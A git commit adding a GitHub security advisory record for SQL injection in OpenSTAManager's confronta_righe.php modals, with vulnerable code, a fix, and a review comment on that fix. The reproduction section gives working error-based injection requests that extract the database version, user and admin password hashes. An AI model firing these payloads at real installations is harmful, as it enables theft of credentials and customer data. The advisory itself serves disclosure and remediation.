Commit f8325f0

1 parent 950d29d commit f8325f0

1 file changed

Lines changed: 64 additions & 0 deletions

@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-mmm5-3g4x-qw39",
4+
"modified": "2026-04-03T21:57:08Z",
5+
"published": "2026-04-03T21:57:08Z",
6+
"aliases": [
7+
"CVE-2026-35470"
8+
],
9+
"summary": "OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals",
10+
"details": "## Description\n\nSix `confronta_righe.php` files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The `righe` parameter received via `$_GET['righe']` is directly concatenated into an SQL query without any sanitization, parameterization or validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.\n\n## Affected Files\n\nAll 6 vulnerable files share the same code pattern:\n\n| # | File | Line | Affected Table |\n|---|------|------|----------------|\n| 1 | `modules/fatture/modals/confronta_righe.php` | 29 | `co_righe_documenti` |\n| 2 | `modules/interventi/modals/confronta_righe.php` | 29 | `in_righe_interventi` |\n| 3 | `modules/preventivi/modals/confronta_righe.php` | 28 | `co_righe_preventivi` |\n| 4 | `modules/ordini/modals/confronta_righe.php` | 29 | `or_righe_ordini` |\n| 5 | `modules/ddt/modals/confronta_righe.php` | 29 | `dt_righe_ddt` |\n| 6 | `modules/contratti/modals/confronta_righe.php` | 28 | `co_righe_contratti` |\n\n## Vulnerable Code\n\nAll files follow the same pattern. 
Example from `modules/interventi/modals/confronta_righe.php`:\n\n```php\n$righe = $_GET['righe']; // Line 29 — No sanitization\n\n$righe = $dbo->fetchArray(\n 'SELECT\n `mg_articoli_lang`.`title`,\n `mg_articoli`.`codice`,\n `in_righe_interventi`.*\n FROM\n `in_righe_interventi`\n INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`\n LEFT JOIN `mg_articoli_lang` ON (...)\n WHERE\n `in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 — Direct concatenation\n);\n```\n\nThe value of `$_GET['righe']` is inserted directly into the SQL `IN()` clause without using `prepare()`, parameterized statements or any sanitization function.\n\n## Reproduction\n\n### Prerequisites\n\n- Authenticated session (any user with module access)\n- At least one existing record in the target module (e.g. an intervention with id=1)\n\n### Step 1: Extract MySQL version\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23\n```\n\n**Result:** `XPATH syntax error: '~8.3.0'`\n\n### Step 2: Extract database user\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23\n```\n\n**Result:** `XPATH syntax error: '~root@172.19.0.3'`\n\n### Step 3: Extract admin credentials\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23\n```\n\n**Result:** `XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'`\n\n### Evidence\n\n<img width=\"1254\" height=\"395\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429\" />\n\n\n### HTTP Request\n\n```http\nGET 
/modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1\nHost: <TARGET>\nCookie: PHPSESSID=<SESSION_ID>\n```\n\n### Response (excerpt)\n\n```\nSQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'\n```\n\n## Impact\n\n- **Confidentiality (High):** Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information\n- **Integrity (High):** Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries\n- **Availability (High):** Deletion of tables or critical data, database corruption\n\n## Remediation\n\n### Recommended Fix\n\nUse parameterized statements with `prepare()` for the `righe` parameter:\n\n```php\n// BEFORE (vulnerable):\n$righe = $_GET['righe'];\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'\n);\n\n// AFTER (secure):\n$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));\n$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',\n $righe_ids\n);\n```\n\nThis fix must be applied to all **6 files** listed in the \"Affected Files\" section.\n\n## Credits\nOmar Ramirez",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "devcode-it/openstamanager"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.10.2"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.10.1"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/devcode-it/openstamanager"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-89"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-03T21:57:08Z",
62+
"nvd_published_at": null
63+
}
64+
}
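Review bot: the "AFTER (secure)" snippet inside the `details` field still lets an empty or missing `righe` reach the query: `array_map('intval', explode(',', $_GET['righe'] ?? ''))` on an empty string yields `[0]`, so one placeholder is built and the lookup runs against id 0 instead of the request being rejected. Suggest the remediation text validate the list before building placeholders, e.g. split on commas, require every element to match `/^\d+$/`, and return early when the resulting array is empty; the `intval` cast then only confirms what the check already enforced. The snippet also assumes `$dbo->fetchArray()` accepts a bound-parameter array as its second argument, which the advisory should state is the project's wrapper signature rather than leave implied. Separately, `references` lists only the release tag `v2.10.2` for the `fixed` event; adding the fixing commit would let readers confirm that all six `confronta_righe.php` files named in the "Affected Files" table were changed.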

0 commit comments